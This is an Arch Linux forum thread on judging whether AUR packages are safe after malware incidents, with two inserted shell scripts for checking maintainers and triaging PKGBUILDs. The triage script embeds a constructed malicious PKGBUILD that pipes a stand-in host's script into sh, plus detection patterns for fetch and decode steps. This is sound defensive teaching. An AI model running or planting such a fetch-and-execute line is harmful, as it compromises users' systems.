Considering the recent aur attacks with malware is it safe to install these packages:
https://aur.archlinux.org/packages/google-chrome
https://aur.archlinux.org/packages/librewolf-bin
https://aur.archlinux.org/packages/microsoft-edge-stable-bin
https://aur.archlinux.org/packages/ulauncher
https://aur.archlinux.org/packages/yacreader-bin
Let's say a random person on the forum tells you they're safe to install, would you install them?
Considering the recent aur attacks with malware is it safe to install these packages:
https://aur.archlinux.org/packages/google-chrome
https://aur.archlinux.org/packages/librewolf-bin
https://aur.archlinux.org/packages/microsoft-edge-stable-bin
https://aur.archlinux.org/packages/ulauncher
https://aur.archlinux.org/packages/yacreader-bin
The whole problem with the AUR is users not doing their due diligence, you need to check. If you have checked please post the details and findings.
Rlu: 222126
Let's say a random person on the forum tells you they're safe to install, would you install them?
No. And no one should.
Edit:
Unless the person cares to explain each part of the PKGBUILD, and justify WHY it is safe upon being asked about it
Last edited by 5hridhyan (2026-06-17 12:03:10)
google-chrome is maintained by me, so I can say for sure that it's safe
Ah yeah, gromit is the exception to my point! Though technically... even if an official PM/Developer maintains it, we should still check the PKGBUILD to make sure "the" account wasn't hijacked by a malicious actor while you slept
Edit:
I mean in most cases 'Trust, but verify' doesn't apply when the person writing the code is the one keeping the lights on around here. If I imagine "PMs/Devs" accounts getting compromised, it wouldn't be limited to the AUR [/terrified]
Last edited by 5hridhyan (2026-06-17 12:31:16)
google-chrome is maintained by me, so I can say for sure that it's safe
Haha, what a perfect response. :-)
Rlu: 222126
Or an evil maid attack, you can't trust anyone.
So, should I look first for flatpak and snap software and use aur packages as a last resort?
flatpak, snap, appimage have their own problems and security risks.
Who do you put your trust in?
My custom local repo has almost 50 aur packages, 20 of which I maintain/co-maintain.
I trust the authors of the 30 other aur packages but still check the changes they make to the packages.
I stay away from flatpak & snap, sometimes use appimages IF they are published by the creators of the software.
Disliking systemd intensely, but not satisfied with alternatives so focusing on taming systemd.
clean chroot building not flexible enough?
Try clean chroot manager by graysky
So, should I look first for flatpak and snap software and use aur packages as a last resort?
I'm unsure about snap but flatpak has the exact same issues as the AUR. It didn't come up because nothing (?) happened yet but in general, flatpak should be treated the same as the AUR.
Yes, but some flatpak and snap software is released by the developers.
As are AUR packages; case in point from your list, the AUR packages of yacreader (the non-bin one!) and ulauncher are released by their respective authors.
That said, the simple answer for this particular set of packages: they are longstanding and have had stable maintainers for a while now, so they will not have been able to be targeted by the recent attack and will most likely be safe (and are, from a quick glance). But what everyone here tries to drive home is the fact that ultimately you need to check what their PKGBUILDs are doing and assess whether the operations within them are safe (and not blindly trust any of us; even if many here have a long standing and likely don't want to fuck you over, it's ultimately your decision and your prerogative). Flatpak or snap cannot save you from this: both can and do have packages by third parties, and their respective sandboxing features are optional unless you configure them to enforce certain constraints (or trust the authors to not fuck you over -- same as the AUR).
Don't trust me, go to the AUR links, check whether the upstream sources are what they claim to be, verify who is packaging them, decide whether you trust that upstream and then install the package.
Last edited by V1del (2026-06-17 15:38:08)
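One way to put "verify who is packaging them" into practice before leaning on the "stable maintainer" argument. This is an added example, not code from the thread or from any AUR tool: it expects the output of `git log --format='%H %aI %an'` from a clone of an AUR package's repository, and embeds a constructed log (placeholder hashes and names) so it runs offline. Git author names are self-reported by whoever pushed, so confirm the result against the "Last Packager" field on the AUR web page rather than trusting the name alone.

```shell
#!/usr/bin/env bash
# Constructed example: has the newest commit to an AUR package come from a
# name that has never committed to it before? Input format per line:
#   <commit hash> <ISO date> <author name>
# (what `git log --format='%H %aI %an'` prints, newest first).
set -u

# Constructed sample log: a long-time maintainer, then a brand-new committer.
SAMPLE_LOG='3333333333333333333333333333333333333333 2026-06-15T10:00:00+00:00 New Person
2222222222222222222222222222222222222222 2025-11-02T09:30:00+00:00 Longtime Maintainer
1111111111111111111111111111111111111111 2024-03-20T08:00:00+00:00 Longtime Maintainer
0000000000000000000000000000000000000000 2023-01-05T07:00:00+00:00 Longtime Maintainer'

# Same history without the newest commit: the package has not changed hands.
STABLE_LOG=$(printf '%s\n' "$SAMPLE_LOG" | tail -n +2)

# Commit counts per author, most active first ("3 Longtime Maintainer").
author_summary() {
  printf '%s\n' "$1" | cut -d' ' -f3- | sort | uniq -c | sort -rn | sed -E 's/^ *//'
}

# Author of the newest commit and how many earlier commits carry that name,
# tab-separated. A count of 0 means the newest change came from a newcomer.
latest_author_history() {
  local latest earlier
  latest=$(printf '%s\n' "$1" | head -n1 | cut -d' ' -f3-)
  earlier=$(printf '%s\n' "$1" | tail -n +2 | cut -d' ' -f3- | grep -cxF -- "$latest" || true)
  printf '%s\t%s\n' "$latest" "$earlier"
}

# "yes" when the newest commit deserves a line-by-line read of the diff.
maintainer_changed() {
  case $(latest_author_history "$1" | cut -f2) in
    0) echo yes ;;
    *) echo no ;;
  esac
}

echo "authors:"; author_summary "$SAMPLE_LOG"
echo "latest:"; latest_author_history "$SAMPLE_LOG"
echo "maintainer changed: $(maintainer_changed "$SAMPLE_LOG")"
```

On a real clone, replace the embedded log with `git log --format='%H %aI %an'` output; a "yes" is not proof of anything bad, only the cue to read the newest commit's diff to the PKGBUILD and any install file instead of assuming continuity.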
Safe how?
https://aur.archlinux.org/packages/google-chrome
https://aur.archlinux.org/packages/microsoft-edge-stable-bin
google-chrome is maintained by me, so I can say for sure that it's safe
idk, you look kinda shady to me
@niko787
The gist here is that you cannot just shift the trust problem from one anonymous source to another.
I'll walk you a bit through https://aur.archlinux.org/cgit/aur.git/ … rewolf-bin
* The first 15 lines are (as of today!) clerical - do you see anything remotely suspicious there?
* Then there're the dependency arrays, all from the repos and nothing obscure like npm or python-pip that would act as sideloading packagemanager. Anything that worries you?
* Line #59 has a pgp key that you can research.
gpg --search-keys 662E3CDD6FE329002D0CA5BB40339DD82B12EF16
* Line #63 is install='librewolf-bin.install' which is a bit of an uh-oh, so we better check that file! https://aur.archlinux.org/cgit/aur.git/ … rewolf-bin
* Pfeewww - it only prints some reminder to stdout.
* Next are the sources, does https://codeberg.org/librewolf/ look legit? How can you figure that?
* Finally the package() function.
- Does anything there look concerning? Does it get other files from the internet? What is that weird "install -Dvm644 /dev/stdin "$distini" <<END" ???
- Then it seems to copy some icons.
- Another of these weird <<END things, gee - I should really figure what this pattern does. Maybe google or an AI or somebody on some forum knows that.
- Then it symlinks some binaries. Is this shady? Luckily it's also documented w/ a link to a bugtracker.
So: did anything there pose a major red flag?
Or even a minor one?
Do you have open questions about what anything in that PKGBUILD does?
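The walkthrough above is a checklist: clerical lines, dependency arrays, the PGP key, the install= file, the source hosts, heredocs and network access inside package(). The script below turns that checklist into a static triage pass. It is an added example, not from the thread, from the librewolf-bin maintainer, or from any Arch tool; it only greps the PKGBUILD and never sources it, because sourcing runs the file's top-level code. The two PKGBUILDs it reads are constructed: hosts, paths, versions and the checksum are placeholders, and only the PGP fingerprint is the one quoted in the thread.

```shell
#!/usr/bin/env bash
# Static PKGBUILD triage helper (constructed example, not an Arch/AUR tool).
# The file is only read with grep/sed and never sourced.
set -u

WORK=$(mktemp -d)

# Constructed sample loosely modelled on the librewolf-bin walkthrough.
SAMPLE_PKGBUILD="$WORK/PKGBUILD.sample"
cat > "$SAMPLE_PKGBUILD" <<'EOF'
# Maintainer: (constructed example)
pkgname=librewolf-bin
pkgver=1.0.0
pkgrel=1
pkgdesc="constructed sample package"
arch=('x86_64')
url="https://codeberg.org/librewolf"
license=('MPL-2.0')
depends=('gtk3' 'dbus-glib')
install='librewolf-bin.install'
source=("https://codeberg.org/librewolf/example/releases/download/v$pkgver/$pkgname-$pkgver.tar.bz2"
        "https://codeberg.org/librewolf/example/releases/download/v$pkgver/$pkgname-$pkgver.tar.bz2.sig")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000' 'SKIP')
validpgpkeys=('662E3CDD6FE329002D0CA5BB40339DD82B12EF16')

package() {
  install -d "$pkgdir/usr/bin"
  install -Dvm644 /dev/stdin "$pkgdir/usr/lib/librewolf/distribution/distribution.ini" <<END
[Global]
id=archlinux
END
  ln -s /usr/lib/librewolf/librewolf "$pkgdir/usr/bin/librewolf"
}
EOF

# Constructed red-flag sample: unpinned download, code fetched at build time.
SUSPECT_PKGBUILD="$WORK/PKGBUILD.suspect"
cat > "$SUSPECT_PKGBUILD" <<'EOF'
pkgname=suspect-example
pkgver=1
pkgrel=1
pkgdesc="constructed sample with red flags"
arch=('any')
url="https://example.invalid"
license=('MIT')
source=("https://example.invalid/suspect-1.tar.gz")
sha256sums=('SKIP')

package() {
  curl -s https://example.invalid/extra.sh | sh
  echo "aGVsbG8=" | base64 -d > "$pkgdir/usr/bin/suspect"
}
EOF

# Hosts named by any URL in the file: compare each against the real upstream.
pkgbuild_hosts() {
  grep -oE 'https?://[A-Za-z0-9.-]+' "$1" | sed -E 's#^https?://##' | sort -u
}

# Value of install= (a script pacman runs as root at install time).
pkgbuild_install_file() {
  grep -E '^install=' "$1" | sed -E "s/^install=//; s/['\"]//g"
}

# Fingerprints in validpgpkeys=(...); research each with gpg --search-keys.
pkgbuild_pgp_keys() {
  sed -nE '/^validpgpkeys=\(/,/\)/p' "$1" | grep -oE '[0-9A-Fa-f]{40}' || true
}

# Heredocs (<<END) write files inline; read their bodies, do not skip them.
pkgbuild_heredocs() {
  grep -nF '<<' "$1" || true
}

# Network fetches or second package managers used during the build
# (the "sideloading" the thread warns about).
pkgbuild_flag_fetch() {
  grep -nE '(^|[^A-Za-z0-9_])(curl|wget|git clone|pip install|npm install|cargo install)([^A-Za-z0-9_]|$)' "$1" || true
}

# Decode/eval steps that hide what actually gets written or executed.
pkgbuild_flag_obfuscation() {
  grep -nE 'base64 (-d|--decode)|xxd -r|(^|[^A-Za-z0-9_])eval([^A-Za-z0-9_]|$)' "$1" || true
}

# SKIP checksums are tolerable only when a detached signature is verified
# via validpgpkeys; otherwise nothing pins what gets downloaded.
pkgbuild_unpinned_sources() {
  if grep -qE "sums=\(.*'SKIP'" "$1" && [ -z "$(pkgbuild_pgp_keys "$1")" ]; then
    echo "checksum SKIP without validpgpkeys: download is not pinned"
  fi
}

pkgbuild_report() {
  local f=$1 section
  echo "== $f"
  for section in hosts install_file pgp_keys heredocs flag_fetch flag_obfuscation unpinned_sources; do
    echo "-- $section"
    "pkgbuild_$section" "$f" | sed 's/^/   /'
  done
}

pkgbuild_report "$SAMPLE_PKGBUILD"
pkgbuild_report "$SUSPECT_PKGBUILD"
```

The report is a reading aid, not a verdict: an empty flag list still leaves you with the hosts, the key and the install file to check by hand, exactly as the walkthrough does, and a flagged curl or heredoc may turn out to be documented and fine.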
niko787 wrote: So, should I look first for flatpak and snap software and use aur packages as a last resort?
I'm unsure about snap but flatpak has the exact same issues as the AUR. It didn't come up because nothing (?) happened yet but in general, flatpak should be treated the same as the AUR.
https://blog.popey.com/2026/01/malware- … l-domains/
I Have Linux Perl Can i Download Gnome???
I wanted to add something so obvious that no one has mentioned it yet: for users not ready (or not willing) to check PKGBUILDs for the AUR, they might consider just looking at alternatives in the official repos instead. There's a lot there, and some users just may not realise there are other apps out there that could work for them.
For example, some of the packages mentioned by the OP:
* google-chrome -> chromium is in the official repos (for new users who may be unaware, that's the open source part of Chrome, without the Google stuff).
* librewolf-bin -> firefox is in the official repos (LibreWolf derives from Firefox).
* yacreader-bin -> a comic book reader I believe... foliate is in the official repos and at least one site says it reads comic books (not my thing, just doing a quick check), there may be others.
I don't mean to question why people prefer one app over another, absolutely make your choices, and I understand why you might want Chrome over Chromium or LibreWolf over Firefox. Just that if you're taking a risk in doing so (by not reading PKGBUILDs), you could consider compromising on functionality instead of security. You might even stumble upon a new favourite app for your needs.